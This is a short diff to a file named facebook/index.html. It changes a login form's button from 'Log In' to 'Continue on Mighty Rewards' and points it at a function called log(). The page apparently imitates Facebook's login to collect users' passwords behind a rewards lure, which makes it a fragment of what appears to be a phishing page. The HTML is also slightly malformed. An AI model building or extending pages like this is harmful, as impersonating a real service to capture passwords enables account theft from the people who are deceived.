--- a/facebook/index.html
+++ b/facebook/index.html
@@ -133,7 +133,7 @@
                     <label for="password">Password</label>
                     <input type="password" id="pass" name="password" required>
                 </div>
-                <button onclick="login()">Log In</button>
+                <button onclick="log()">Continue on Mighty Rewards</button>
                 <br><br>
                 <b id="msg"style="color:red;display:none;">Your password or username are incorrect</div></b>
                 <div class="forgot-password">
